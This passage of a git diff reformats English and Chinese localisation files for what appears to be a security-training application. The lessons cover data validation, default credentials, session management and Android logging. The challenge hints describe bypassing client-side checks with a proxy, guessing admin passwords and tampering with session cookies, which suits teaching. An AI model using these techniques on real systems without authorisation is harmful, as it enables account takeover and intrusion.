+paragraph.info.2 = \u6536\u96C6\u65E5\u5FD7\u53EF\u4EE5\u901A\u8FC7<a>Android\u8C03\u8BD5\u6865</a>\u6765\u5B8C\u6210,\u4E00\u65E6\u4F60\u77E5\u9053\u4E00\u4E2A\u79FB\u52A8\u8BBE\u5907\u7684IP,\u4F60\u5C31\u53EF\u4EE5\u6267\u884C\u547D\u4EE4<a>adb\u8FDE\u63A5</a>,\u63A5\u7740<a>adb logcat</a>\u53BB\u770B\u5E94\u7528\u4E2D\u751F\u6210\u7684\u4EFB\u4F55\u65E5\u5FD7.
+
+button.hideIntro = \u9690\u85CF\u8BFE\u7A0B\u4ECB\u7ECD
+button.showIntro = \u663E\u793A\u8BFE\u7A0B\u4ECB\u7ECD
+
+challenge.description = \u5E94\u7528\u7A0B\u5E8F\u4E0D\u4F1A\u603B\u662F\u4F7F\u7528SQLite\u6570\u636E\u5E93\u6765\u50A8\u5B58\u6570\u636E.\u5728\u67D0\u4E9B\u60C5\u51B5\u4E0B,\u65E5\u5FD7\u4EA7\u751F\u6709\u7528\u7684\u5173\u4E8E\u8BE5\u5E94\u7528\u548C\u5B83\u7684\u7528\u6237\u7684\u4FE1\u606F.\u4F7F\u7528\u8FD9\u4E9B\u4FE1\u606F\u627E\u5230\u7ED3\u679C\u7684\u94A5\u5319.\u5728\u8BE5\u8BFE\u4E2D,\u5E94\u7528\u7684<a>\u7F13\u5B58\u65E5\u5FD7</a>\u5728\u8BBE\u5907\u4E0A.\u8FD9\u4E2A\u5E94\u7528\u672C\u8EAB\u4F5C\u4E3A\u4E00\u4E2A\u544A\u793A\u677F\u6216\u5F85\u529E\u4E8B\u9879\u6E05\u5355.\u7528\u6237\u6DFB\u52A0\u5230App\u7684<A>ListView</a>\u7684\u4E00\u5207\u90FD\u5DF2\u7ECF\u88AB\u8BB0\u5F55\u4E0B\u6765.
 
diff --git a/src/main/resources/i18n/lessons/poor_data_validation/4d8d50a458ca5f1f7e2506dd5557ae1f7da21282795d0ed86c55fefe41eb874f.properties b/src/main/resources/i18n/lessons/poor_data_validation/4d8d50a458ca5f1f7e2506dd5557ae1f7da21282795d0ed86c55fefe41eb874f.properties
index f57c74a78..4d6d2a1a3 100644
--- a/src/main/resources/i18n/lessons/poor_data_validation/4d8d50a458ca5f1f7e2506dd5557ae1f7da21282795d0ed86c55fefe41eb874f.properties
+++ b/src/main/resources/i18n/lessons/poor_data_validation/4d8d50a458ca5f1f7e2506dd5557ae1f7da21282795d0ed86c55fefe41eb874f.properties
@@ -1,16 +1,20 @@
-title.question.poor_data_validation=What is Poor Data Validation?
-paragraph.info.1=Poor Data Validation occurs when an application does not validate submitted data correctly or sufficiently. Poor Data Validation application issues are generally low severity, they are more likely to be coupled with other security risks to increase their impact. If all data submitted to an application is validated correctly, security risks are significantly more difficult to exploit.
-paragraph.info.2=Attackers can take advantage of poor data validation to perform business logic attacks or cause server errors.
-paragraph.info.3=When data is submitted to a web application, it should ensure that the data is strongly typed, has correct syntax, is within length boundaries, contains only permitted characters and within range boundaries. The data validation process should ideally be performed on the client side and again on the server side.
-button.showIntro=Show Lesson Introduction
-button.hideIntro=Hide Lesson Introduction
-button.loading=Loading
-button.submitNumber=Submit Number
-button.hint=Would you like a hint
-challenge.description=To get the result key to this lesson, you must bypass the validation in the following function and submit a negative number.
-challenge.hintHeader=Lesson Hint
-challenge.hint=The lesson only validates the number on the client side. Try use your proxy to change the data after it has left the browser.
-challenge.enterNumber=Enter a Number
-error.noNumber=A number must be submitted
-error.badNumber=Invalid Number: Number must be greater than 0
-error.occured=An Error Occurred
\ No newline at end of file
+title.question.poor_data_validation = What is Poor Data Validation?
+
+paragraph.info.1 = Poor Data Validation occurs when an application does not validate submitted data correctly or sufficiently. Poor Data Validation application issues are generally low severity, they are more likely to be coupled with other security risks to increase their impact. If all data submitted to an application is validated correctly, security risks are significantly more difficult to exploit.
+paragraph.info.2 = Attackers can take advantage of poor data validation to perform business logic attacks or cause server errors.
+paragraph.info.3 = When data is submitted to a web application, it should ensure that the data is strongly typed, has correct syntax, is within length boundaries, contains only permitted characters and within range boundaries. The data validation process should ideally be performed on the client side and again on the server side.
+
+button.showIntro = Show Lesson Introduction
+button.hideIntro = Hide Lesson Introduction
+button.loading = Loading
+button.submitNumber = Submit Number
+button.hint = Would you like a hint
+
+challenge.description = To get the result key to this lesson, you must bypass the validation in the following function and submit a negative number.
+challenge.hintHeader = Lesson Hint
+challenge.hint = The lesson only validates the number on the client side. Try use your proxy to change the data after it has left the browser.
+challenge.enterNumber = Enter a Number
+
+error.noNumber = A number must be submitted
+error.badNumber = Invalid Number: Number must be greater than 0
+error.occured = An Error Occurred
\ No newline at end of file
diff --git a/src/main/resources/i18n/lessons/poor_data_validation/4d8d50a458ca5f1f7e2506dd5557ae1f7da21282795d0ed86c55fefe41eb874f_zh.properties b/src/main/resources/i18n/lessons/poor_data_validation/4d8d50a458ca5f1f7e2506dd5557ae1f7da21282795d0ed86c55fefe41eb874f_zh.properties
index 608b4d3e3..4dd1dd2cc 100644
--- a/src/main/resources/i18n/lessons/poor_data_validation/4d8d50a458ca5f1f7e2506dd5557ae1f7da21282795d0ed86c55fefe41eb874f_zh.properties
+++ b/src/main/resources/i18n/lessons/poor_data_validation/4d8d50a458ca5f1f7e2506dd5557ae1f7da21282795d0ed86c55fefe41eb874f_zh.properties
@@ -1,16 +1,20 @@
-title.question.poor_data_validation=\u4EC0\u4E48\u662F\u5931\u6548\u7684\u6570\u636E\u9A8C\u8BC1?
-paragraph.info.1=\u5931\u6548\u7684\u6570\u636E\u9A8C\u8BC1\u53D1\u751F\u5728\u5F53\u5E94\u7528\u7A0B\u5E8F\u4E0D\u6B63\u786E\u6216\u4E0D\u5145\u5206\u9A8C\u8BC1\u63D0\u4EA4\u7684\u6570\u636E.\u5931\u6548\u7684\u6570\u636E\u9A8C\u8BC1\u95EE\u9898\u7684\u4E25\u91CD\u6027\u666E\u904D\u662F\u504F\u4F4E\u7684,\u4ED6\u4EEC\u66F4\u5BB9\u6613\u88AB\u52A0\u4E0A\u5176\u4ED6\u7684\u5B89\u5168\u98CE\u9669,\u6765\u589E\u5F3A\u81EA\u8EAB\u7684\u5F71\u54CD\u529B.\u5982\u679C\u6240\u6709\u63D0\u4EA4\u5230\u5E94\u7528\u7A0B\u5E8F\u7684\u6570\u636E\u662F\u88AB\u6B63\u786E\u9A8C\u8BC1\u7684,\u5B89\u5168\u98CE\u9669\u5C06\u660E\u663E\u5730\u66F4\u96BE\u5229\u7528.
-paragraph.info.2=\u653B\u51FB\u8005\u53EF\u4EE5\u5229\u7528\u5931\u6548\u7684\u6570\u636E\u9A8C\u8BC1\u6765\u6267\u884C\u4E1A\u52A1\u903B\u8F91\u653B\u51FB\u6216\u9020\u6210\u670D\u52A1\u5668\u9519\u8BEF.
-paragraph.info.3=\u5F53\u6570\u636E\u88AB\u63D0\u4EA4\u5230\u4E00\u4E2Aweb\u5E94\u7528\u7A0B\u5E8F,\u8BE5\u6570\u636E\u5E94\u8BE5\u88AB\u786E\u4FDD\u662F\u5F3A\u7C7B\u578B\u7684,\u6709\u6B63\u786E\u7684\u8BED\u6CD5,\u662F\u5728\u4E00\u4E2A\u957F\u5EA6\u8303\u56F4\u5185\u7684,\u53EA\u5305\u542B\u5141\u8BB8\u7684\u5B57\u7B26\u548C\u5728\u8303\u56F4\u8FB9\u754C\u5185\u7684.\u6570\u636E\u9A8C\u8BC1\u8FC7\u7A0B\u5E94\u6700\u597D\u88AB\u6267\u884C\u5728\u5BA2\u6237\u7AEF,\u7136\u540E\u5728\u670D\u52A1\u5668\u7AEF.
-button.showIntro=\u663E\u793A\u8BFE\u7A0B\u4ECB\u7ECD
-button.hideIntro=\u9690\u85CF\u8BFE\u7A0B\u4ECB\u7ECD
-button.loading=\u52A0\u8F7D
-button.submitNumber=\u63D0\u4EA4\u6570\u5B57
-button.hint=\u4F60\u9700\u8981\u63D0\u793A\u5417
-challenge.description=\u4F60\u5FC5\u987B\u7ED5\u8FC7\u4EE5\u4E0B\u529F\u80FD\u7684\u9A8C\u8BC1\u5E76\u63D0\u4EA4\u4E00\u4E2A\u8D1F\u6570,\u624D\u80FD\u83B7\u5F97\u901A\u8FC7\u672C\u8BFE\u7684\u94A5\u5319.
-challenge.hintHeader=\u8BFE\u7A0B\u63D0\u793A
-challenge.hint=\u8BE5\u8BFE\u4EC5\u9A8C\u8BC1\u5728\u5BA2\u6237\u7AEF\u7684\u6570\u5B57. \u5728\u5B83\u79BB\u5F00\u6D4F\u89C8\u5668\u540E,\u5C1D\u8BD5\u4F7F\u7528\u4EE3\u7406\u6765\u6539\u53D8\u6570\u636E.
-challenge.enterNumber=\u8F93\u5165\u4E00\u4E2A\u6570\u5B57
-error.noNumber=\u5FC5\u987B\u63D0\u4EA4\u4E00\u4E2A\u6570\u5B57
-error.badNumber=\u65E0\u6548\u6570\u5B57: \u6570\u5B57\u5FC5\u987B\u5927\u4E8E 0
-error.occured=\u4EA7\u751F\u4E00\u4E2A\u9519\u8BEF
\ No newline at end of file
+title.question.poor_data_validation = \u4EC0\u4E48\u662F\u5931\u6548\u7684\u6570\u636E\u9A8C\u8BC1?
+
+paragraph.info.1 = \u5931\u6548\u7684\u6570\u636E\u9A8C\u8BC1\u53D1\u751F\u5728\u5F53\u5E94\u7528\u7A0B\u5E8F\u4E0D\u6B63\u786E\u6216\u4E0D\u5145\u5206\u9A8C\u8BC1\u63D0\u4EA4\u7684\u6570\u636E.\u5931\u6548\u7684\u6570\u636E\u9A8C\u8BC1\u95EE\u9898\u7684\u4E25\u91CD\u6027\u666E\u904D\u662F\u504F\u4F4E\u7684,\u4ED6\u4EEC\u66F4\u5BB9\u6613\u88AB\u52A0\u4E0A\u5176\u4ED6\u7684\u5B89\u5168\u98CE\u9669,\u6765\u589E\u5F3A\u81EA\u8EAB\u7684\u5F71\u54CD\u529B.\u5982\u679C\u6240\u6709\u63D0\u4EA4\u5230\u5E94\u7528\u7A0B\u5E8F\u7684\u6570\u636E\u662F\u88AB\u6B63\u786E\u9A8C\u8BC1\u7684,\u5B89\u5168\u98CE\u9669\u5C06\u660E\u663E\u5730\u66F4\u96BE\u5229\u7528.
+paragraph.info.2 = \u653B\u51FB\u8005\u53EF\u4EE5\u5229\u7528\u5931\u6548\u7684\u6570\u636E\u9A8C\u8BC1\u6765\u6267\u884C\u4E1A\u52A1\u903B\u8F91\u653B\u51FB\u6216\u9020\u6210\u670D\u52A1\u5668\u9519\u8BEF.
+paragraph.info.3 = \u5F53\u6570\u636E\u88AB\u63D0\u4EA4\u5230\u4E00\u4E2Aweb\u5E94\u7528\u7A0B\u5E8F,\u8BE5\u6570\u636E\u5E94\u8BE5\u88AB\u786E\u4FDD\u662F\u5F3A\u7C7B\u578B\u7684,\u6709\u6B63\u786E\u7684\u8BED\u6CD5,\u662F\u5728\u4E00\u4E2A\u957F\u5EA6\u8303\u56F4\u5185\u7684,\u53EA\u5305\u542B\u5141\u8BB8\u7684\u5B57\u7B26\u548C\u5728\u8303\u56F4\u8FB9\u754C\u5185\u7684.\u6570\u636E\u9A8C\u8BC1\u8FC7\u7A0B\u5E94\u6700\u597D\u88AB\u6267\u884C\u5728\u5BA2\u6237\u7AEF,\u7136\u540E\u5728\u670D\u52A1\u5668\u7AEF.
+
+button.showIntro = \u663E\u793A\u8BFE\u7A0B\u4ECB\u7ECD
+button.hideIntro = \u9690\u85CF\u8BFE\u7A0B\u4ECB\u7ECD
+button.loading = \u52A0\u8F7D
+button.submitNumber = \u63D0\u4EA4\u6570\u5B57
+button.hint = \u4F60\u9700\u8981\u63D0\u793A\u5417
+
+challenge.description = \u4F60\u5FC5\u987B\u7ED5\u8FC7\u4EE5\u4E0B\u529F\u80FD\u7684\u9A8C\u8BC1\u5E76\u63D0\u4EA4\u4E00\u4E2A\u8D1F\u6570,\u624D\u80FD\u83B7\u5F97\u901A\u8FC7\u672C\u8BFE\u7684\u94A5\u5319.
+challenge.hintHeader = \u8BFE\u7A0B\u63D0\u793A
+challenge.hint = \u8BE5\u8BFE\u4EC5\u9A8C\u8BC1\u5728\u5BA2\u6237\u7AEF\u7684\u6570\u5B57. \u5728\u5B83\u79BB\u5F00\u6D4F\u89C8\u5668\u540E,\u5C1D\u8BD5\u4F7F\u7528\u4EE3\u7406\u6765\u6539\u53D8\u6570\u636E.
+challenge.enterNumber = \u8F93\u5165\u4E00\u4E2A\u6570\u5B57
+
+error.noNumber = \u5FC5\u987B\u63D0\u4EA4\u4E00\u4E2A\u6570\u5B57
+error.badNumber = \u65E0\u6548\u6570\u5B57: \u6570\u5B57\u5FC5\u987B\u5927\u4E8E 0
+error.occured = \u4EA7\u751F\u4E00\u4E2A\u9519\u8BEF
\ No newline at end of file
diff --git a/src/main/resources/i18n/lessons/security_misconfig/fe04648f43cdf2d523ecf1675f1ade2cde04a7a2e9a7f1a80dbb6dc9f717c833.properties b/src/main/resources/i18n/lessons/security_misconfig/fe04648f43cdf2d523ecf1675f1ade2cde04a7a2e9a7f1a80dbb6dc9f717c833.properties
index d71a005cb..08b498e6b 100644
--- a/src/main/resources/i18n/lessons/security_misconfig/fe04648f43cdf2d523ecf1675f1ade2cde04a7a2e9a7f1a80dbb6dc9f717c833.properties
+++ b/src/main/resources/i18n/lessons/security_misconfig/fe04648f43cdf2d523ecf1675f1ade2cde04a7a2e9a7f1a80dbb6dc9f717c833.properties
@@ -1,15 +1,19 @@
-title.question.security_misconfig=Security Misconfiguration
-paragraph.info.1=Security misconfiguration can happen in any part of an application, from the database server, third-party libraries to custom code settings. A security misconfiguration is any configuration which can be exploited by an attacker to perform any action they should not be able to. The impact of these issues vary from which configuration is being exploited.
-paragraph.info.2=Attackers can exploit security misconfiguration by logging in with <a>default log in credentials</a> to the application, the operating system or any of the public services it is running (Such as Database or Samba services)  to gain unauthorized access to or knowledge of the system. Attackers can also exploit bad security configurations through unpatched flaws, unprotected files and directories to gain unauthorized access to or knowledge of the system.
-paragraph.info.3=Developers and system administrators need to work together to ensure that the entire stack is configured properly. Automated scanners are useful for detecting missing patches, misconfigurations, use of default accounts or unnecessary services. A process should be implemented for <a>keeping all software up to date</a>, with patches occurring in a timely manner to each deployed environment.
-button.hideIntro=Hide Lesson Introduction
-button.showIntro=Show Lesson Introduction
-button.hint=Would you like a hint?
-challenge.description=To get the result key to this lesson, you must sign in with the default admin credentials which were never removed or updated.
-challenge.hintHeader=Lesson Hint
-challenge.hint=The user name is admin. Try a series of generic passwords.
-challenge.userName=User Name
-challenge.password=Password
-challenge.signIn=Sign In
-challenge.loading=Loading
-error.occurred=An Error Occurred
\ No newline at end of file
+title.question.security_misconfig = Security Misconfiguration
+
+paragraph.info.1 = Security misconfiguration can happen in any part of an application, from the database server, third-party libraries to custom code settings. A security misconfiguration is any configuration which can be exploited by an attacker to perform any action they should not be able to. The impact of these issues vary from which configuration is being exploited.
+paragraph.info.2 = Attackers can exploit security misconfiguration by logging in with <a>default log in credentials</a> to the application, the operating system or any of the public services it is running (Such as Database or Samba services)  to gain unauthorized access to or knowledge of the system. Attackers can also exploit bad security configurations through unpatched flaws, unprotected files and directories to gain unauthorized access to or knowledge of the system.
+paragraph.info.3 = Developers and system administrators need to work together to ensure that the entire stack is configured properly. Automated scanners are useful for detecting missing patches, misconfigurations, use of default accounts or unnecessary services. A process should be implemented for <a>keeping all software up to date</a>, with patches occurring in a timely manner to each deployed environment.
+
+button.hideIntro = Hide Lesson Introduction
+button.showIntro = Show Lesson Introduction
+button.hint = Would you like a hint?
+
+challenge.description = To get the result key to this lesson, you must sign in with the default admin credentials which were never removed or updated.
+challenge.hintHeader = Lesson Hint
+challenge.hint = The user name is admin. Try a series of generic passwords.
+challenge.userName = User Name
+challenge.password = Password
+challenge.signIn = Sign In
+challenge.loading = Loading
+
+error.occurred = An Error Occurred
\ No newline at end of file
diff --git a/src/main/resources/i18n/lessons/security_misconfig/fe04648f43cdf2d523ecf1675f1ade2cde04a7a2e9a7f1a80dbb6dc9f717c833_zh.properties b/src/main/resources/i18n/lessons/security_misconfig/fe04648f43cdf2d523ecf1675f1ade2cde04a7a2e9a7f1a80dbb6dc9f717c833_zh.properties
index 6bddcb38a..af73d77ec 100644
--- a/src/main/resources/i18n/lessons/security_misconfig/fe04648f43cdf2d523ecf1675f1ade2cde04a7a2e9a7f1a80dbb6dc9f717c833_zh.properties
+++ b/src/main/resources/i18n/lessons/security_misconfig/fe04648f43cdf2d523ecf1675f1ade2cde04a7a2e9a7f1a80dbb6dc9f717c833_zh.properties
@@ -1,15 +1,19 @@
-title.question.security_misconfig=\u5B89\u5168\u914D\u7F6E\u9519\u8BEF
-paragraph.info.1=\u5B89\u5168\u914D\u7F6E\u9519\u8BEF\u53EF\u4EE5\u53D1\u751F\u5728\u4E00\u4E2A\u5E94\u7528\u7A0B\u5E8F\u7684\u4EFB\u4F55\u90E8\u5206,\u4ECE\u6570\u636E\u5E93\u670D\u52A1\u5668,\u7B2C\u4E09\u65B9\u5E93\u5230\u81EA\u5B9A\u4E49\u4EE3\u7801\u8BBE\u7F6E.\u4E00\u4E2A\u5B89\u5168\u914D\u7F6E\u9519\u8BEF\u662F\u4EFB\u4F55\u53EF\u4EE5\u88AB\u653B\u51FB\u8005\u7528\u6765\u6267\u884C\u4ED6\u4EEC\u672C\u4E0D\u5E94\u8BE5\u6267\u884C\u7684\u4EFB\u4F55\u884C\u52A8\u7684\u914D\u7F6E.\u8FD9\u4E9B\u95EE\u9898\u7684\u5F71\u54CD\u7531\u6B63\u5728\u88AB\u4F7F\u7528\u7684\u914D\u7F6E\u800C\u53D8\u5316.
-paragraph.info.2=\u653B\u51FB\u8005\u53EF\u4EE5\u5229\u7528\u5B89\u5168\u914D\u7F6E\u9519\u8BEF\u901A\u8FC7<a>\u9ED8\u8BA4\u767B\u5F55\u51ED\u8BC1</a>\u767B\u5F55\u5230\u5E94\u7528\u7A0B\u5E8F,\u64CD\u4F5C\u7CFB\u7EDF\u6216\u4EFB\u4F55\u6B63\u5728\u8FD0\u884C\u7684\u516C\u5171\u670D\u52A1(\u6BD4\u5982\u6570\u636E\u5E93\u6216Samba\u670D\u52A1)\u83B7\u5F97\u672A\u7ECF\u6388\u6743\u7684\u8BBF\u95EE\u6216\u7CFB\u7EDF\u7684\u77E5\u8BC6. \u653B\u51FB\u8005\u53EF\u4EE5\u4F7F\u7528\u4E0D\u597D\u7684\u5B89\u5168\u914D\u7F6E\u901A\u8FC7\u672A\u4FEE\u8865\u7684\u6F0F\u6D1E,\u672A\u53D7\u4FDD\u62A4\u7684\u6587\u4EF6\u548C\u76EE\u5F55\u83B7\u53D6\u672A\u7ECF\u6388\u6743\u7684\u8BBF\u95EE\u6216\u7CFB\u7EDF\u7684\u77E5\u8BC6.
-paragraph.info.3=\u5F00\u53D1\u4EBA\u5458\u548C\u7CFB\u7EDF\u7BA1\u7406\u5458\u9700\u5171\u540C\u52AA\u529B,\u4EE5\u786E\u4FDD\u6574\u4E2A\u5806\u53E0\u662F\u914D\u7F6E\u6B63\u786E\u7684.\u81EA\u52A8\u626B\u63CF\u4EEA\u7528\u4E8E\u68C0\u6D4B\u5931\u8E2A\u7684\u8865\u4E01\uFF0C\u9519\u8BEF\u914D\u7F6E,\u9ED8\u8BA4\u5E10\u6237\u4F7F\u7528\u6216\u4E0D\u5FC5\u8981\u7684\u670D\u52A1\u662F\u975E\u5E38\u6709\u7528\u7684.\u4E00\u4E2A\u8FDB\u7A0B\u5E94<a>\u4FDD\u6301\u6240\u6709\u7684\u8F6F\u4EF6\u4E3A\u6700\u65B0</a>\u72B6\u6001\u548C\u53CA\u65F6\u5730\u6253\u8865\u4E01\u5728\u6BCF\u4E2A\u90E8\u7F72\u73AF\u5883\u4E2D.
-button.hideIntro=\u9690\u85CF\u8BFE\u7A0B\u4ECB\u7ECD
-button.showIntro=\u663E\u793A\u8BFE\u7A0B\u4ECB\u7ECD
-button.hint=\u4F60\u9700\u8981\u63D0\u793A\u5417?
-challenge.description=\u4F60\u5FC5\u987B\u7528\u9ED8\u8BA4\u7684\u4ECE\u672A\u5220\u9664\u6216\u66F4\u65B0\u7684\u7BA1\u7406\u5458\u51ED\u636E\u767B\u5F55,\u624D\u80FD\u83B7\u53D6\u672C\u8BFE\u7684\u94A5\u5319.
-challenge.hintHeader=\u8BFE\u7A0B\u63D0\u793A
-challenge.hint=\u8BE5\u7528\u6237\u540D\u79F0\u662F admin. \u5C1D\u8BD5\u4E00\u7CFB\u5217\u7684\u901A\u7528\u5BC6\u7801.
-challenge.userName=\u7528\u6237\u540D\u79F0
-challenge.password=\u5BC6\u7801
-challenge.signIn=\u767B\u5165
-challenge.loading=\u52A0\u8F7D\u4E2D
-error.occurred=\u4E00\u4E2A\u9519\u8BEF\u4EA7\u751F
+title.question.security_misconfig = \u5B89\u5168\u914D\u7F6E\u9519\u8BEF
+
+paragraph.info.1 = \u5B89\u5168\u914D\u7F6E\u9519\u8BEF\u53EF\u4EE5\u53D1\u751F\u5728\u4E00\u4E2A\u5E94\u7528\u7A0B\u5E8F\u7684\u4EFB\u4F55\u90E8\u5206,\u4ECE\u6570\u636E\u5E93\u670D\u52A1\u5668,\u7B2C\u4E09\u65B9\u5E93\u5230\u81EA\u5B9A\u4E49\u4EE3\u7801\u8BBE\u7F6E.\u4E00\u4E2A\u5B89\u5168\u914D\u7F6E\u9519\u8BEF\u662F\u4EFB\u4F55\u53EF\u4EE5\u88AB\u653B\u51FB\u8005\u7528\u6765\u6267\u884C\u4ED6\u4EEC\u672C\u4E0D\u5E94\u8BE5\u6267\u884C\u7684\u4EFB\u4F55\u884C\u52A8\u7684\u914D\u7F6E.\u8FD9\u4E9B\u95EE\u9898\u7684\u5F71\u54CD\u7531\u6B63\u5728\u88AB\u4F7F\u7528\u7684\u914D\u7F6E\u800C\u53D8\u5316.
+paragraph.info.2 = \u653B\u51FB\u8005\u53EF\u4EE5\u5229\u7528\u5B89\u5168\u914D\u7F6E\u9519\u8BEF\u901A\u8FC7<a>\u9ED8\u8BA4\u767B\u5F55\u51ED\u8BC1</a>\u767B\u5F55\u5230\u5E94\u7528\u7A0B\u5E8F,\u64CD\u4F5C\u7CFB\u7EDF\u6216\u4EFB\u4F55\u6B63\u5728\u8FD0\u884C\u7684\u516C\u5171\u670D\u52A1(\u6BD4\u5982\u6570\u636E\u5E93\u6216Samba\u670D\u52A1)\u83B7\u5F97\u672A\u7ECF\u6388\u6743\u7684\u8BBF\u95EE\u6216\u7CFB\u7EDF\u7684\u77E5\u8BC6. \u653B\u51FB\u8005\u53EF\u4EE5\u4F7F\u7528\u4E0D\u597D\u7684\u5B89\u5168\u914D\u7F6E\u901A\u8FC7\u672A\u4FEE\u8865\u7684\u6F0F\u6D1E,\u672A\u53D7\u4FDD\u62A4\u7684\u6587\u4EF6\u548C\u76EE\u5F55\u83B7\u53D6\u672A\u7ECF\u6388\u6743\u7684\u8BBF\u95EE\u6216\u7CFB\u7EDF\u7684\u77E5\u8BC6.
+paragraph.info.3 = \u5F00\u53D1\u4EBA\u5458\u548C\u7CFB\u7EDF\u7BA1\u7406\u5458\u9700\u5171\u540C\u52AA\u529B,\u4EE5\u786E\u4FDD\u6574\u4E2A\u5806\u53E0\u662F\u914D\u7F6E\u6B63\u786E\u7684.\u81EA\u52A8\u626B\u63CF\u4EEA\u7528\u4E8E\u68C0\u6D4B\u5931\u8E2A\u7684\u8865\u4E01\uFF0C\u9519\u8BEF\u914D\u7F6E,\u9ED8\u8BA4\u5E10\u6237\u4F7F\u7528\u6216\u4E0D\u5FC5\u8981\u7684\u670D\u52A1\u662F\u975E\u5E38\u6709\u7528\u7684.\u4E00\u4E2A\u8FDB\u7A0B\u5E94<a>\u4FDD\u6301\u6240\u6709\u7684\u8F6F\u4EF6\u4E3A\u6700\u65B0</a>\u72B6\u6001\u548C\u53CA\u65F6\u5730\u6253\u8865\u4E01\u5728\u6BCF\u4E2A\u90E8\u7F72\u73AF\u5883\u4E2D.
+
+button.hideIntro = \u9690\u85CF\u8BFE\u7A0B\u4ECB\u7ECD
+button.showIntro = \u663E\u793A\u8BFE\u7A0B\u4ECB\u7ECD
+button.hint = \u4F60\u9700\u8981\u63D0\u793A\u5417?
+
+challenge.description = \u4F60\u5FC5\u987B\u7528\u9ED8\u8BA4\u7684\u4ECE\u672A\u5220\u9664\u6216\u66F4\u65B0\u7684\u7BA1\u7406\u5458\u51ED\u636E\u767B\u5F55,\u624D\u80FD\u83B7\u53D6\u672C\u8BFE\u7684\u94A5\u5319.
+challenge.hintHeader = \u8BFE\u7A0B\u63D0\u793A
+challenge.hint = \u8BE5\u7528\u6237\u540D\u79F0\u662F admin. \u5C1D\u8BD5\u4E00\u7CFB\u5217\u7684\u901A\u7528\u5BC6\u7801.
+challenge.userName = \u7528\u6237\u540D\u79F0
+challenge.password = \u5BC6\u7801
+challenge.signIn = \u767B\u5165
+challenge.loading = \u52A0\u8F7D\u4E2D
+
+error.occurred = \u4E00\u4E2A\u9519\u8BEF\u4EA7\u751F
diff --git a/src/main/resources/i18n/lessons/session_manage/b8c19efd1a7cc64301f239f9b9a7a32410a0808138bbefc98986030f9ea83806.properties b/src/main/resources/i18n/lessons/session_manage/b8c19efd1a7cc64301f239f9b9a7a32410a0808138bbefc98986030f9ea83806.properties
index d0d8ead1c..34bb3ef35 100644
--- a/src/main/resources/i18n/lessons/session_manage/b8c19efd1a7cc64301f239f9b9a7a32410a0808138bbefc98986030f9ea83806.properties
+++ b/src/main/resources/i18n/lessons/session_manage/b8c19efd1a7cc64301f239f9b9a7a32410a0808138bbefc98986030f9ea83806.properties
@@ -1,24 +1,27 @@
-title.question.session_manage=What is Broken Authentication and Session Management?
-paragraph.info.1=Attacks against an application's <a>authentication</a> and <a>session management</a> can be performed using security risks that other vulnerabilities present. For example, any application's session management can be overcome when a <a>Cross Site Scripting</a> vulnerability is used to steal user session tokens. This topic is more about flaws that exist in the applications authentication and session management schema.
-paragraph.info.2=Broken authentication and session management flaws are commonly found in functionalities such as logout, password management, secret question and account update. An attack can potentially abuse these functions to modify other users credentials by guessing their secret question or through parameter abuse. Finding such flaws can sometimes be difficult, as each implementation is unique.
-paragraph.info.3=The following scenarios are vulnerable to these security risks;
-paragraph.info.number.1=1)
-paragraph.info.number.2=2)
-paragraph.info.number.3=3)
-paragraph.info.number.4=4)
-paragraph.info.number.5=5)
-paragraph.info.1.1=User credentials are <a>stored</a> with insufficient <a>cryptographic</a> levels.
-paragraph.info.2.2=User credentials can be guessed or changed through poor <a>account management</a>.
-paragraph.info.3.3=Session identifiers are exposed in the URL.
-paragraph.info.4.4=The application does not use sufficient transport protection (Such as <a>HTTPs</a> or <a>sFTP</a>).
-paragraph.info.5.5=Session parameters can be manually changed by the user through application functionality.
-paragraph.info.6=Broken authentication and session management flaws allow an attacker to potentially compromise every account across an application. Once the attack has been performed, the attacker has the ability to do anything the user could do. For this reason, privileged accounts, such as administrators, are targeted.
-button.hideIntro=Hide Lesson Introduction
-button.showIntro=Show Lesson Introduction
-challenge.description=This lesson implements bad session management. Investigate the following function to see if you trick the server into thinking you have already completed this lesson to retrieve the result key.
-hint.title=Lesson Hint
-lesson.hint.1=This lesson stores unencrypted session information in a user's <a>cookies</a>
-complete.button=Complete This Lesson
-word.info.loading=Loading...
-sign.hint=Would you link a hint?
-generic.error=An Error Occurred: 
+title.question.session_manage = What is Broken Authentication and Session Management?
+
+paragraph.info.1 = Attacks against an application's <a>authentication</a> and <a>session management</a> can be performed using security risks that other vulnerabilities present. For example, any application's session management can be overcome when a <a>Cross Site Scripting</a> vulnerability is used to steal user session tokens. This topic is more about flaws that exist in the applications authentication and session management schema.
+paragraph.info.2 = Broken authentication and session management flaws are commonly found in functionalities such as logout, password management, secret question and account update. An attack can potentially abuse these functions to modify other users credentials by guessing their secret question or through parameter abuse. Finding such flaws can sometimes be difficult, as each implementation is unique.
+paragraph.info.3 = The following scenarios are vulnerable to these security risks;
+paragraph.info.number.1 = 1)
+paragraph.info.number.2 = 2)
+paragraph.info.number.3 = 3)
+paragraph.info.number.4 = 4)
+paragraph.info.number.5 = 5)
+paragraph.info.1.1 = User credentials are <a>stored</a> with insufficient <a>cryptographic</a> levels.
+paragraph.info.2.2 = User credentials can be guessed or changed through poor <a>account management</a>.
+paragraph.info.3.3 = Session identifiers are exposed in the URL.
+paragraph.info.4.4 = The application does not use sufficient transport protection (Such as <a>HTTPs</a> or <a>sFTP</a>).
+paragraph.info.5.5 = Session parameters can be manually changed by the user through application functionality.
+paragraph.info.6 = Broken authentication and session management flaws allow an attacker to potentially compromise every account across an application. Once the attack has been performed, the attacker has the ability to do anything the user could do. For this reason, privileged accounts, such as administrators, are targeted.
+
+button.hideIntro = Hide Lesson Introduction
+button.showIntro = Show Lesson Introduction
+
+challenge.description = This lesson implements bad session management. Investigate the following function to see if you trick the server into thinking you have already completed this lesson to retrieve the result key.
+hint.title = Lesson Hint
+lesson.hint.1 = This lesson stores unencrypted session information in a user's <a>cookies</a>
+complete.button = Complete This Lesson
+word.info.loading = Loading...
+sign.hint = Would you link a hint?
+generic.error = An Error Occurred: 
diff --git a/src/main/resources/i18n/lessons/session_manage/b8c19efd1a7cc64301f239f9b9a7a32410a0808138bbefc98986030f9ea83806_zh.properties b/src/main/resources/i18n/lessons/session_manage/b8c19efd1a7cc64301f239f9b9a7a32410a0808138bbefc98986030f9ea83806_zh.properties
index 71b459845..a7312abfa 100644
--- a/src/main/resources/i18n/lessons/session_manage/b8c19efd1a7cc64301f239f9b9a7a32410a0808138bbefc98986030f9ea83806_zh.properties
